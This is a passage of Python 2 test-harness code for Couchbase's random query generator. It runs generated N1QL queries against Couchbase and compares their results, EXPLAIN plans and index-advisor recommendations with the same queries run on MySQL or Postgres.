self.using_gsi = self.input.param("using_gsi", True)
self.reset_database = self.input.param("reset_database", True)
self.create_primary_index = self.input.param("create_primary_index", False)
self.create_secondary_indexes = self.input.param("create_secondary_indexes", False)
self.use_advisor = self.input.param("use_advisor", False)
self.items = self.input.param("items", 1000)
self.mysql_url = self.input.param("mysql_url", "localhost")
self.mysql_url = self.mysql_url.replace("_", ".")
self.gen_secondary_indexes = self.input.param("gen_secondary_indexes", False)
self.gen_gsi_indexes = self.input.param("gen_gsi_indexes", True)
self.n1ql_server = self.get_nodes_from_services_map(service_type="n1ql")
self.create_all_indexes = self.input.param("create_all_indexes", False)
self.concurreny_count = self.input.param("concurreny_count", 10)
self.total_queries = self.input.param("total_queries", None)
self.run_query_without_index_hint = self.input.param("run_query_without_index_hint", True)
self.run_query_with_primary = self.input.param("run_query_with_primary", False)
self.run_query_with_secondary = self.input.param("run_query_with_secondary", False)
self.run_explain_with_hints = self.input.param("run_explain_with_hints", False)
self.test_file_path = self.input.param("test_file_path", None)
self.secondary_index_info_path = self.input.param("secondary_index_info_path", None)
self.db_dump_path = self.input.param("db_dump_path", None)
self.input_rqg_path = self.input.param("input_rqg_path", None)
self.set_limit = self.input.param("set_limit", 0)
self.build_index_batch_size = self.input.param("build_index_batch_size", 1000)
self.query_count = 0
self.use_rest = self.input.param("use_rest", True)
self.ram_quota = self.input.param("ram_quota", 512)
self.drop_index = self.input.param("drop_index", False)
self.drop_bucket = self.input.param("drop_bucket", False)
self.dynamic_indexing = self.input.param("dynamic_indexing", False)
self.partitioned_indexes = self.input.param("partitioned_indexes", False)
self.pushdown = self.input.param("pushdown", False)
self.subquery = self.input.param("subquery", False)
self.drop_secondary_indexes = self.input.param("drop_secondary_indexes", True)
self.query_helper = self._initialize_rqg_query_helper()
self.n1ql_helper = self._initialize_n1ql_helper()
self.rest = RestConnection(self.master)
self.indexer_memQuota = self.input.param("indexer_memQuota", 1024)
self.teardown_mysql = self.use_mysql and self.reset_database and (not self.skip_cleanup)
self.keyword_list = self.query_helper._read_keywords_from_file("b/resources/rqg/n1ql_info/keywords.txt")
self.use_secondary_index = self.run_query_with_secondary or self.run_explain_with_hints
self.check_explain_plan = self.input.param("explain_plan", False)
self.index_limit = self.input.param("index_limit", 5)
self.advise_server = self.input.advisor
self.advise_buckets = ["bucket_01", "bucket_02", "bucket_03", "bucket_04", "bucket_05", "bucket_06", "bucket_07", "bucket_08", "bucket_09", "bucket_10"]
self.advise_dict={}
if self.input_rqg_path is not None:
self.secondary_index_info_path = self.input_rqg_path+"/index/secondary_index_definitions.txt"
self.db_dump_path = self.input_rqg_path+"/db_dump/database_dump.zip"
self.test_file_path = self.input_rqg_path+"/input/source_input_rqg_run.txt"
if self.initial_loading_to_cb:
self._initialize_cluster_setup()
if self.subquery:
self.items = 500
if not self.use_rest:
self._ssh_client = paramiko.SSHClient()
self._ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.os = self.shell.extract_remote_info().type.lower()
except Exception, ex:
self.log.info("============== RQG Setup Has Failed ==============")
traceback.print_exc()
self.assertTrue(False)
self.tearDown()
self.log.info("============== RQG Setup Has Completed ==============")
def tearDown(self):
try:
self.log.info("============== RQG BasTestCase Teardown Has Started ==============")
super(BaseRQGTests, self).tearDown()
self.log.info("============== RQG BasTestCase Teardown Has Completed ==============")
self.log.info("============== RQG Teardown Has Started ==============")
if hasattr(self, 'reset_database'):
if self.teardown_mysql:
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
self.kill_mysql_processes(client)
client.drop_database(self.database)
except Exception, ex:
self.log.info("============== RQG Teardown Has Failed ==============")
self.log.info(ex)
self.log.info("============== RQG Teardown Has Completed ==============")
def kill_mysql_processes(self, client):
columns, rows = client._execute_query(query="select concat('KILL ',id,';') from information_schema.processlist where user='root' and time > 0;")
sql_result = client._gen_json_from_results(columns, rows)
for result in sql_result:
for key in result.keys():
query = result[key]
# execute kill query
client._db_execute_query(query=query)
client.drop_database(self.database)
def test_rqg(self):
try:
# Get Data Map
table_list = self.client._get_table_list()
table_map = self.client._get_values_with_type_for_fields_in_table()
if self.remove_alias:
table_map = self.remove_aliases_from_table_map(table_map)
if self.crud_ops:
table_list.remove("copy_simple_table")
query_template_list = self.extract_query_templates()
# Generate the query batches based on the given template file and the concurrency count
batches = self.generate_batches(table_list, query_template_list)
result_queue = Queue.Queue()
failure_queue = Queue.Queue()
input_queue = Queue.Queue()
# Run Test Batches
thread_list = []
start_test_case_number = 1
if self.crud_ops:
for table_name in table_list:
if len(batches[table_name]) > 0:
self._crud_ops_worker(batches[table_name], table_name, table_map, result_queue, failure_queue)
#t = threading.Thread(target=self._crud_ops_worker, args=(
#batches[table_name], table_name, table_map, result_queue, failure_queue))
#t.daemon = True
#t.start()
#thread_list.append(t)
#for t in thread_list:
#t.join()
else:
while not batches.empty():
# Split up the batches and send them to the worker threads
try:
test_batch = batches.get(False)
except Exception, ex:
break
test_query_template_list = [test_data[test_data.keys()[0]] for test_data in test_batch]
input_queue.put({"start_test_case_number": start_test_case_number,
"query_template_list": test_query_template_list})
start_test_case_number += len(test_query_template_list)
for table_name in table_list:
# Create threads based on number of tables (each table has its own thread)
self._rqg_worker(table_name, table_map, input_queue, result_queue,
failure_queue)
#t = threading.Thread(target=self._rqg_worker,
# args=(table_name, table_map, input_queue, result_queue,
# failure_queue))
#t.daemon = True
#t.start()
#thread_list.append(t)
#for t in thread_list:
# if(t.is_alive()):
# t.join()
# Analyze the results for the failure and assert on the run
self.analyze_test(result_queue, failure_queue)
except Exception, ex:
traceback.print_exc()
self.log.info(ex)
self.assertFalse(True)
def _rqg_worker(self, table_name, table_map, input_queue, result_queue, failure_record_queue=None):
count = 0
table_name_description_map = {table_name: table_map[table_name]}
while True:
if self.total_queries <= self.query_count:
break
if not input_queue.empty():
data = input_queue.get()
start_test_case_number = data["start_test_case_number"]
query_template_list = data["query_template_list"]
# create strings for queries and indexes but doesnt send indexes to Couchbase
sql_n1ql_index_map_list = self.client._convert_template_query_info(table_map=table_name_description_map,
n1ql_queries=query_template_list,
define_gsi_index=self.use_secondary_index,
aggregate_pushdown=self.aggregate_pushdown,
partitioned_indexes=self.partitioned_indexes,
ansi_joins=self.ansi_joins,
with_let=self.with_let)
for sql_n1ql_index_map in sql_n1ql_index_map_list:
sql_n1ql_index_map["n1ql"] = sql_n1ql_index_map['n1ql'].replace("simple_table", self.database+"_"+"simple_table")
# build indexes
if self.use_secondary_index:
self._generate_secondary_indexes_in_batches(sql_n1ql_index_map_list)
thread_list = []
test_case_number = start_test_case_number
for test_case_input in sql_n1ql_index_map_list:
t = threading.Thread(target=self._run_basic_test, args=(test_case_input, test_case_number, result_queue, failure_record_queue))
#self._run_basic_test(test_case_input, test_case_number, result_queue, failure_record_queue)
test_case_number += 1
t.daemon = True
t.start()
thread_list.append(t)
# Drop all the secondary Indexes
for t in thread_list:
t.join()
if self.use_secondary_index and self.drop_secondary_indexes:
self._drop_secondary_indexes_in_batches(sql_n1ql_index_map_list)
else:
count += 1
if count > 1000:
return
def n1ql_query_runner_wrapper(self, n1ql_query="", server=None, query_params={}, scan_consistency=None, verbose=True):
if self.use_advisor:
self.create_secondary_index(n1ql_query=n1ql_query)
result = self.n1ql_helper.run_cbq_query(query=n1ql_query, server=server, query_params=query_params, scan_consistency=scan_consistency, verbose=verbose)
return result
def prepare_advise_query(self, n1ql_query=""):
for bucket in self.advise_dict.keys():
n1ql_query = n1ql_query.replace(bucket, self.advise_dict[bucket])
return n1ql_query
def translate_index_statement(self, n1ql_query=""):
for key in self.advise_dict.keys():
n1ql_query = n1ql_query.replace(self.advise_dict[key], key)
return n1ql_query
def create_secondary_index(self, n1ql_query=""):
if self.count_secondary_indexes() >= self.index_limit:
self.remove_all_secondary_indexes()
self.n1ql_helper.wait_for_all_indexes_online()
advise_query = self.prepare_advise_query(n1ql_query=n1ql_query)
advise_result = self.n1ql_helper.run_cbq_query(query="ADVISE " + advise_query,
server=self.advise_server)
if len(advise_result["results"][0]["advice"]["adviseinfo"]) == 0:
return
if "No index recommendation at this time" not in str(
str(advise_result["results"][0]["advice"]["adviseinfo"][0]["recommended_indexes"])):
if "indexes" in advise_result["results"][0]["advice"]["adviseinfo"][0][
"recommended_indexes"].keys():
for index_statement_array in advise_result["results"][0]["advice"]["adviseinfo"][0]["recommended_indexes"]["indexes"]:
index_statement = index_statement_array["index_statement"]
if index_statement != "":
self.n1ql_helper.wait_for_all_indexes_online()
try:
prepared_index_statement = self.translate_index_statement(index_statement)
self.n1ql_helper.run_cbq_query(prepared_index_statement)
self.n1ql_helper.wait_for_all_indexes_online()
except CBQError, ex:
if "already exists" in str(ex):
continue
if "covering_indexes" in advise_result["results"][0]["advice"]["adviseinfo"][0][
"recommended_indexes"].keys():
for index_statement_array in advise_result["results"][0]["advice"]["adviseinfo"][0]["recommended_indexes"]["covering_indexes"]:
index_statement = index_statement_array["index_statement"]
if index_statement != "":
self.n1ql_helper.wait_for_all_indexes_online()
try:
prepared_index_statement = self.translate_index_statement(index_statement)
self.n1ql_helper.run_cbq_query(prepared_index_statement)
self.n1ql_helper.wait_for_all_indexes_online()
except CBQError, ex:
if "already exists" in str(ex):
continue
def count_secondary_indexes(self):
count = self.n1ql_helper.run_cbq_query("select count(*) from system:indexes")
return int(count["results"][0]["$1"])
def remove_all_secondary_indexes(self):
self.n1ql_helper.drop_all_indexes()
def _run_basic_test(self, query_test_map, test_case_number, result_queue, failure_record_queue=None):
n1ql_query = query_test_map["n1ql"]
sql_query = query_test_map["sql"]
indexes = query_test_map["indexes"]
expected_result = query_test_map["expected_result"]
sql_query, n1ql_query = self.handle_limit_offset(sql_query, n1ql_query)
n1ql_query = self.handle_n1ql_table_name(n1ql_query)
sql_query, n1ql_query, aggregate = self.handle_subquery(sql_query, n1ql_query)
n1ql_query = self.handle_hash_join(n1ql_query)
self.log.info(" <<<<<<<<<<<<<<<<<<<<<<<<<<<< BEGIN RUNNING TEST {0} >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>".format(
test_case_number))
# results dict
result_run = dict()
result_run["n1ql_query"] = n1ql_query
result_run["sql_query"] = sql_query
result_run["test_case_number"] = test_case_number
if self.ansi_transform:
result = self._run_explain_queries(n1ql_query=n1ql_query, keyword="u'outer':u'True'", present=False)
result_run.update(result)
if self.check_explain_plan:
result_run['check_explain_plan'] = self._check_explain_plan_for_secondary_index(n1ql_query=n1ql_query);
# run the query
result_run["run_query_without_index_hint"] = self._run_queries_and_verify(aggregate=aggregate,
subquery=self.subquery,
n1ql_query=n1ql_query,
sql_query=sql_query,
expected_result=expected_result)
if expected_result is None:
expected_result = self._gen_expected_result(sql_query, test_case_number)
query_test_map["expected_result"] = expected_result
if self.set_limit > 0 and n1ql_query.find("DISTINCT") > 0:
result_limit = self.query_helper._add_limit_to_query(n1ql_query, self.set_limit)
result_run["run_query_with_limit"] = self._run_queries_and_verify(aggregate=aggregate,
subquery=self.subquery,
n1ql_query=result_limit,
sql_query=sql_query,
expected_result=expected_result)
if self.run_query_with_primary:
index_info = [{"name": "`#primary`", "type": "GSI"}]
n1ql_query_with_hints = self.query_helper._add_index_hints_to_query(n1ql_query, index_info)
result_run["run_query_with_primary"] = self._run_queries_and_verify(aggregate=aggregate,
subquery=self.subquery,
n1ql_query=n1ql_query_with_hints,
sql_query=sql_query,
expected_result=expected_result)
if self.aggregate_pushdown == "primary" and not self.with_let:
result_run["aggregate_explain_check::#primary"] = self._run_query_with_pushdown_check(n1ql_query,
index_info)
if self.run_query_with_secondary:
for index_name in indexes.keys():
n1ql_query_with_hints = self.query_helper._add_index_hints_to_query(n1ql_query, [indexes[index_name]])
result_run["run_query_with_index_name::{0}" + str(index_name)] = self._run_queries_and_verify(
aggregate=aggregate,
subquery=self.subquery,
n1ql_query=n1ql_query_with_hints,
sql_query=sql_query,
expected_result=expected_result)
if self.run_explain_with_hints:
result = self._run_queries_with_explain(n1ql_query, indexes)
result_run.update(result)
if self.aggregate_pushdown and not self.with_let:
for index_name in indexes.keys():
result_run["aggregate_explain_check::" + str(index_name)] = self._run_query_with_pushdown_check(
n1ql_query,
indexes[index_name])
if self.ansi_joins and self.hash_joins:
self._verify_query_with_hash_joins(n1ql_query)
result_queue.put(result_run)
self._check_and_push_failure_record_queue(result_run, query_test_map, failure_record_queue)
self.query_count += 1
self.log.info(" <<<<<<<<<<<<<<<<<<<<<<<<<<<< END RUNNING TEST {0} >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>".format(test_case_number))
def _crud_ops_worker(self, list_info, table_name, table_map, result_queue=None, failure_record_queue=None):
table_name_map = {table_name: table_map[table_name]}
for test_data in list_info:
test_case_number = test_data.keys()[0]
test_data = test_data[test_case_number]
data_info = self.convert_crud_ops_query(table_name, [test_data], table_name_map)
verification_query = "SELECT * from {0} where primary_key_id is not null ORDER by primary_key_id".format(table_name)
self._run_basic_crud_test(data_info[0], verification_query, test_case_number, result_queue, failure_record_queue, table_name=table_name)
self._populate_delta_buckets(table_name)
self.wait_for_num_items(table_name, 1000)
def remove_aliases_from_table_map(self, table_map):
for key in table_map.keys():
if "alias_name" in table_map[key].keys():
table_map[key].pop("alias_name")
return table_map
def extract_query_templates(self):
file_paths = self.test_file_path.split(":")
query_template_list = []
for file_path in file_paths:
file_path = self.unzip_template(file_path)
cur_queries_list = []
with open(file_path) as f:
cur_queries_list = f.readlines()
for q in cur_queries_list:
query_template_list.append(q)
if self.total_queries is None:
self.total_queries = len(query_template_list)
return query_template_list
def generate_batches(self, table_list, query_template_list):
if self.crud_ops:
batches = {}
for table_name in table_list:
batches[table_name] = []
else:
batches = Queue.Queue()
batch = []
count = 1
inserted_count = 0
test_case_number = 1
for template_query in query_template_list:
if self.crud_ops:
batches[table_list[test_case_number % (len(table_list))]].append({str(test_case_number): template_query})
else:
batch.append({str(test_case_number): template_query})
if count == self.concurreny_count:
inserted_count += len(batch)
batches.put(batch)
count = 1
batch = []
else:
count += 1
test_case_number += 1
if test_case_number > self.total_queries:
break
if not self.crud_ops:
if len(batch) > 0:
batches.put(batch)
return batches
def analyze_test(self, result_queue, failure_queue):
success, summary, result = self._test_result_analysis(result_queue)
self.log.info(result)
self.dump_failure_data(failure_queue)
self.assertTrue(success, summary)
def convert_crud_ops_query(self, table_name, data_info, table_name_map):
if self.crud_type == "update":
data_info = self.client_map[table_name]._convert_update_template_query_info(
table_map=table_name_map,
n1ql_queries=data_info)
elif self.crud_type == "delete":
data_info = self.client_map[table_name]._convert_delete_template_query_info(
table_map=table_name_map,
n1ql_queries=data_info)
elif self.crud_type == "merge_update":
data_info = self.client_map[table_name]._convert_update_template_query_info_with_merge(
source_table=self.database+"_"+"copy_simple_table",
target_table=table_name,
table_map=table_name_map,
n1ql_queries=data_info)
elif self.crud_type == "merge_delete":
data_info = self.client_map[table_name]._convert_delete_template_query_info_with_merge(
source_table=self.database+"_"+"copy_simple_table",
target_table=table_name,
table_map=table_name_map,
n1ql_queries=data_info)
return data_info
def wait_for_num_items(self, table, num_items):
num_items_reached = False
while not num_items_reached:
self.sleep(1)
query = "SELECT COUNT(*) from {0}".format(self.database+"_"+table)
result = self.n1ql_query_runner_wrapper(n1ql_query=query, server=self.n1ql_server)
if result["results"][0]["$1"] == num_items:
num_items_reached = True
def handle_limit_offset(self, sql_query, n1ql_query):
if "NUMERIC_VALUE1" in n1ql_query:
limit = random.randint(1, 30)
n1ql_query = n1ql_query.replace("NUMERIC_VALUE1", str(limit))
sql_query = sql_query.replace("NUMERIC_VALUE1", str(limit))
if limit < 10:
offset = limit - 2
else:
offset = limit - 10
if offset < 0:
offset = 0
n1ql_query = n1ql_query.replace("NUMERIC_VALUE2", str(offset))
sql_query = sql_query.replace("NUMERIC_VALUE2", str(offset))
self.log.info(" SQL QUERY :: {0}".format(sql_query))
self.log.info(" N1QL QUERY :: {0}".format(n1ql_query))
return sql_query, n1ql_query
def handle_n1ql_table_name(self, n1ql_query):
if (n1ql_query.find("simple_table") > 0) and ((self.database+"_"+"simple_table") not in n1ql_query):
n1ql_query = n1ql_query.replace("simple_table", self.database+"_"+"simple_table")
return n1ql_query
def handle_subquery(self, sql_query, n1ql_query):
aggregate = False
if self.subquery:
n1ql_query = n1ql_query.replace(self.database+"_"+"simple_table_2", "t_5.simple_table_2")
n1ql_query = n1ql_query.replace("t_5.t_5.simple_table_2", "t_5.simple_table_2")
if "qty" in n1ql_query:
n1ql_query = n1ql_query.replace("t_2.qty", "qty")
n1ql_query = n1ql_query.replace("qty", "t_2.qty")
if "sum" in n1ql_query:
n1ql_query = n1ql_query.replace("sum(t_1.productId)", "sum(t_1.qty)")
sql_query = sql_query.replace("sum(t_1.productId)", "sum(t_1.qty)")
n1ql_query = n1ql_query.replace("t_5.simple_table_2 t_1.price", "t_1.price")
sql_query = sql_query.replace("simple_table_2 t_1.price", "t_1.price")
n1ql_query = n1ql_query + " order by primary_key_id limit 5"
sql_query = sql_query + " order by t_5.primary_key_id limit 5"
if "sum" in n1ql_query or "min" in n1ql_query or "max" in n1ql_query or "count" in n1ql_query:
aggregate = True
return sql_query, n1ql_query, aggregate
def handle_hash_join(self, n1ql_query):
if self.ansi_joins and self.hash_joins:
hash_join_template_list = ["HASH(build)", "HASH(probe)"]
n1ql_query.replace(" ON ", "{0} ON ".random.choice(hash_join_template_list))
return n1ql_query
def _run_query_with_pushdown_check(self, n1ql_query, index):
message = "Pass"
explain_check = False
if isinstance(index, dict):
index = [index]
query = self.query_helper._add_index_hints_to_query(n1ql_query, index)
explain_n1ql = "EXPLAIN " + query
try:
actual_result = self.n1ql_helper.run_cbq_query(query=explain_n1ql, server=self.n1ql_server)
if "index_group_aggs" in str(actual_result):
explain_check = True
if not explain_check:
message = "aggregate query {0} with index {1} failed explain result, index_group_aggs not found".format(n1ql_query, index)
self.log.info(message)
self.log.info(str(actual_result))
except Exception, ex:
self.log.info(ex)
message = ex
explain_check = False
finally:
return {"success": explain_check, "result": message}
def _verify_query_with_hash_joins(self, n1ql_query):
message = "Pass"
explain_check = True
explain_n1ql = "EXPLAIN " + n1ql_query
hash_query_count = n1ql_query.count("HASH")
try:
actual_result = self.n1ql_helper.run_cbq_query(query=explain_n1ql, server=self.n1ql_server)
hash_explain_count = str(actual_result).count("HashJoin")
explain_check = (hash_query_count == hash_explain_count)
if not explain_check:
message = "Join query {0} with failed explain result, HashJoins not found".format(n1ql_query)
self.log.info(message)
self.log.info(str(actual_result))
except Exception, ex:
self.log.info(ex)
message = ex
explain_check = False
finally:
return {"success": explain_check, "result": message}
def _run_basic_crud_test(self, test_data, verification_query, test_case_number, result_queue, failure_record_queue=None, table_name=None):
self.log.info(" <<<<<<<<<<<<<<<<<<<<<<<<<<<< BEGIN RUNNING TEST {0} >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>".format(test_case_number))
result_run = {}
n1ql_query = test_data["n1ql_query"]
if n1ql_query.find("copy_simple_table") > 0:
n1ql_query = n1ql_query.replace("simple_table", self.database+"_"+"simple_table")
n1ql_query = n1ql_query.replace("copy_"+self.database+"_"+"simple_table", "copy_simple_table")
n1ql_query = n1ql_query.replace("ON KEY copy_simple_table", "ON KEY " + self.database+"_"+"copy_simple_table")
else:
n1ql_query = n1ql_query.replace("simple_table", self.database+"_"+"simple_table")
test_data["n1ql_query"] = n1ql_query
sql_query = test_data["sql_query"]
result_run["n1ql_query"] = n1ql_query
result_run["sql_query"] = sql_query
result_run["test_case_number"] = test_case_number
self.log.info("SQL :: {0}".format(sql_query))
self.log.info("N1QL :: {0}".format(n1ql_query))
crud_ops_run_result = None
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
try:
self.n1ql_query_runner_wrapper(n1ql_query=n1ql_query, server=self.n1ql_server)
client._insert_execute_query(query=sql_query)
except Exception, ex:
self.log.info(ex)
crud_ops_run_result = {"success": False, "result": str(ex)}
client._close_connection()
client._close_connection()
if crud_ops_run_result is None:
query_index_run = self._run_queries_and_verify_crud(n1ql_query=verification_query, sql_query=verification_query, expected_result=None, table_name=table_name)
else:
query_index_run = crud_ops_run_result
result_run["crud_verification_test"] = query_index_run
result_queue.put(result_run)
self._check_and_push_failure_record_queue(result_run, test_data, failure_record_queue)
self.log.info(" <<<<<<<<<<<<<<<<<<<<<<<<<<<< END RUNNING TEST {0} >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>".format(test_case_number))
def _test_result_analysis(self, queue):
result_list = []
pass_case = 0
fail_case = 0
failure_map = {}
keyword_map = {}
failure_reason_map = {}
success = True
while not queue.empty():
result_list.append(queue.get())
total = len(result_list)
for result_run in result_list:
test_case_number = result_run["test_case_number"]
sql_query = result_run["sql_query"]
n1ql_query = result_run["n1ql_query"]
check, message, failure_types = self._analyze_result(result_run)
success = success and check
if check:
pass_case += 1
else:
fail_case += 1
for failure_reason_type in failure_types:
if failure_reason_type not in failure_reason_map.keys():
failure_reason_map[failure_reason_type] = 1
else:
failure_reason_map[failure_reason_type] += 1
keyword_list = self.query_helper.find_matching_keywords(n1ql_query, self.keyword_list)
for keyword in keyword_list:
if keyword not in keyword_map.keys():
keyword_map[keyword] = 1
else:
keyword_map[keyword] += 1
failure_map[test_case_number] = {"sql_query": sql_query, "n1ql_query": n1ql_query,
"run_result": message, "keyword_list": keyword_list}
pass_percent = 0
if total > 0:
summary = " Total Queries Run = {0}, Pass = {1}, Fail = {2}, Pass Percentage = {3} %".format(total, pass_case, fail_case, ((pass_case*100)/total))
else:
summary = " No Query Results Found"
if len(keyword_map) > 0:
summary += "\n [ KEYWORD FAILURE DISTRIBUTION ] \n"
for keyword in keyword_map.keys():
summary += keyword+" :: " + str((keyword_map[keyword]*100)/total)+"%\n "
if len(failure_reason_map) > 0:
summary += "\n [ FAILURE TYPE DISTRIBUTION ] \n"
for keyword in failure_reason_map.keys():
summary += keyword+" :: " + str((failure_reason_map[keyword]*100)/total)+"%\n "
self.log.info(" Total Queries Run = {0}, Pass = {1}, Fail = {2}, Pass Percentage = {3} %".format(total, pass_case, fail_case, ((pass_case*100)/total)))
result = self._generate_result(failure_map)
return success, summary, result
def _gen_expected_result(self, sql="", test=49):
sql_result = []
try:
client = None
if self.use_mysql:
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
elif self.use_postgres:
client = RQGPostgresClient()
if test == 51:
columns = []
rows = []
else:
columns, rows = client._execute_query(query=sql)
if self.aggregate_pushdown:
sql_result = client._gen_json_from_results_repeated_columns(columns, rows)
else:
sql_result = client._gen_json_from_results(columns, rows)
client._close_connection()
except Exception, ex:
self.log.info(ex)
traceback.print_exc()
if ex.message.__contains__("SQL syntax") or ex.message.__contains__("ERROR"):
print "Error in sql syntax"
return sql_result
def _check_explain_plan_for_secondary_index(self, n1ql_query=None):
self.n1ql_query_runner_wrapper(n1ql_query=n1ql_query, server=self.n1ql_server)
actual_result = self.n1ql_helper.run_cbq_query(query="EXPLAIN "+n1ql_query, server=self.n1ql_server)
self.log.info("EXPLAIN PLAN :: "+str(actual_result))
if "PrimaryScan" in str(actual_result['results'][0]['plan']):
return {"success": False, "result": "Fail"}
else:
return {"success": True, "result": "Pass"}
def _run_queries_and_verify(self, aggregate=False, subquery=False, n1ql_query=None, sql_query=None, expected_result=None):
if not self.create_primary_index:
n1ql_query = n1ql_query.replace("USE INDEX(`#primary` USING GSI)", " ")
if self.prepared:
n1ql_query = "PREPARE " + n1ql_query
self.log.info(" SQL QUERY :: {0}".format(sql_query))
self.log.info(" N1QL QUERY :: {0}".format(n1ql_query))
# Run n1ql query
hints = self.query_helper._find_hints(sql_query)
for i, item in enumerate(hints):
if "simple_table" in item:
hints[i] = hints[i].replace("simple_table", self.database+"_"+"simple_table")
try:
if subquery:
query_params = {'timeout': '1200s'}
else:
query_params={}
actual_result = self.n1ql_query_runner_wrapper(n1ql_query=n1ql_query, server=self.n1ql_server, query_params=query_params, scan_consistency="request_plus")
if self.prepared:
name = actual_result["results"][0]['name']
prepared_query = "EXECUTE '%s'" % name
self.log.info(" N1QL QUERY :: {0}".format(prepared_query))
actual_result = self.n1ql_query_runner_wrapper(n1ql_query=prepared_query, server=self.n1ql_server, query_params=query_params, scan_consistency="request_plus")
n1ql_result = actual_result["results"]
# Run SQL Query
sql_result = expected_result
client = None
if self.use_mysql:
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
elif self.use_postgres:
client = RQGPostgresClient()
if expected_result is None:
columns, rows = client._execute_query(query=sql_query)
if self.aggregate_pushdown:
sql_result = client._gen_json_from_results_repeated_columns(columns, rows)
else:
sql_result = client._gen_json_from_results(columns, rows)
client._close_connection()
self.log.info(" result from n1ql query returns {0} items".format(len(n1ql_result)))
self.log.info(" result from sql query returns {0} items".format(len(sql_result)))
if len(n1ql_result) != len(sql_result):
self.log.info("number of results returned from sql and n1ql are different")
self.log.info("sql query is {0}".format(sql_query))
self.log.info("n1ql query is {0}".format(n1ql_query))
if (len(sql_result) == 0 and len(n1ql_result) == 1) or (len(n1ql_result) == 0 and len(sql_result) == 1) or (len(sql_result) == 0):
return {"success": True, "result": "Pass"}
return {"success": False, "result": str("different results")}
try:
self.n1ql_helper._verify_results_rqg(subquery, aggregate, sql_result=sql_result, n1ql_result=n1ql_result, hints=hints, aggregate_pushdown=self.aggregate_pushdown)
except Exception, ex:
self.log.info(ex)
traceback.print_exc()
return {"success": False, "result": str(ex)}
return {"success": True, "result": "Pass"}
except Exception, ex:
self.log.info(ex)
traceback.print_exc()
return {"success": False, "result": str(ex)}
def _run_queries_and_verify_crud(self, n1ql_query=None, sql_query=None, expected_result=None, table_name=None):
self.log.info(" SQL QUERY :: {0}".format(sql_query))
self.log.info(" N1QL QUERY :: {0}".format(n1ql_query))
if n1ql_query.find(self.database) <= 0:
n1ql_query = n1ql_query.replace("simple_table", self.database+"_"+"simple_table")
hints = self.query_helper._find_hints(sql_query)
for i, item in enumerate(hints):
if "simple_table" in item:
hints[i] = hints[i].replace("simple_table", self.database+"_"+"simple_table")
try:
actual_result = self.n1ql_query_runner_wrapper(n1ql_query=n1ql_query, server=self.n1ql_server, scan_consistency="request_plus")
n1ql_result = actual_result["results"]
# Run SQL Query
sql_result = expected_result
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
if expected_result is None:
columns, rows = client._execute_query(query=sql_query)
sql_result = client._gen_json_from_results(columns, rows)
client._close_connection()
self.log.info(" result from n1ql query returns {0} items".format(len(n1ql_result)))
self.log.info(" result from sql query returns {0} items".format(len(sql_result)))
if len(n1ql_result) != len(sql_result):
self.log.info("number of results returned from sql and n1ql are different")
self.log.info("sql query is {0}".format(sql_query))
self.log.info("n1ql query is {0}".format(n1ql_query))
if (len(sql_result) == 0 and len(n1ql_result) == 1) or (len(n1ql_result) == 0 and len(sql_result) == 1) or (len(sql_result) == 0):
return {"success": True, "result": "Pass"}
try:
self.n1ql_helper._verify_results_crud_rqg(sql_result=sql_result, n1ql_result=n1ql_result, hints=hints)
except Exception, ex:
self.log.info(ex)
return {"success": False, "result": str(ex)}
return {"success": True, "result": "Pass"}
except Exception, ex:
return {"success": False, "result": str(ex)}
def _run_queries_with_explain(self, n1ql_query=None, indexes={}):
run_result = {}
# Run n1ql query
for index_name in indexes:
hint = "USE INDEX({0} USING {1})".format(index_name, indexes[index_name]["type"])
n1ql = self.query_helper._add_explain_with_hints(n1ql_query, hint)
self.log.info(n1ql)
message = "Pass"
check = True
fieldsnotcovered = False
if self.check_covering_index:
query = "select * from system:indexes where name = '%s'" % index_name
actual_result = self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server)
n1ql_result = actual_result["results"]
fields = n1ql_result[0]["indexes"]["index_key"]
fieldsnotcovered = self.query_helper.check_groupby_orderby(n1ql_query, fields)
if "NOT" in n1ql or "not" in n1ql or fieldsnotcovered and self.check_covering_index:
key = "Explain for index {0}".format(index_name)
run_result[key] = {"success": check, "result": message}
else:
try:
actual_result = self.n1ql_query_runner_wrapper(n1ql_query=n1ql, server=self.n1ql_server)
self.log.info(actual_result)
check = self.n1ql_helper.verify_index_with_explain(actual_result, index_name,
self.check_covering_index)
if not check:
message = " query {0} failed explain result, index {1} not found".format(n1ql_query, index_name)
self.log.info(message)
except Exception, ex:
self.log.info(ex)
message = ex
check = False
finally:
key = "Explain for index {0}".format(index_name)
run_result[key] = {"success": check, "result": message}
return run_result
def _run_explain_queries(self, n1ql_query=None, keyword ="", present=True):
run_result = {}
# Run n1ql query
n1ql = self.query_helper._add_explain_with_hints(n1ql_query)
self.log.info("Running query: " + n1ql)
message = "Pass"
try:
actual_result = self.n1ql_query_runner_wrapper(n1ql_query=n1ql, server=self.n1ql_server)
self.log.info(actual_result)
check = self.n1ql_helper.verify_explain(actual_result, keyword, present)
if not check:
if present:
message = " query {0} failed explain result, keyword {1} not found".format(n1ql_query, keyword)
else:
message = " query {0} failed explain result, keyword {1} was found but should not be present".format(n1ql_query, keyword)
self.log.info(message)
except Exception, ex:
self.log.info(ex)
message = ex
check = False
finally:
key = "Explain for query: {0}".format(n1ql)
run_result[key] = {"success": check, "result": message}
return run_result
def _initialize_cluster_setup(self):
if self.use_mysql:
self.log.info(" Will load directly from mysql")
self._initialize_mysql_client()
if not self.generate_input_only:
self._setup_and_load_buckets()
elif self.use_postgres:
self._initialize_postgres_client()
if not self.generate_input_only:
self._setup_and_load_buckets()
else:
self.log.info(" Will load directly from file snap-shot")
if self.populate_with_replay:
self._initialize_mysql_client()
self._setup_and_load_buckets_from_files()
self.n1ql_helper = self._initialize_n1ql_helper()
# create copy of simple table if this is a merge operation
self.sleep(10)
if self.gsi_type == "memory_optimized":
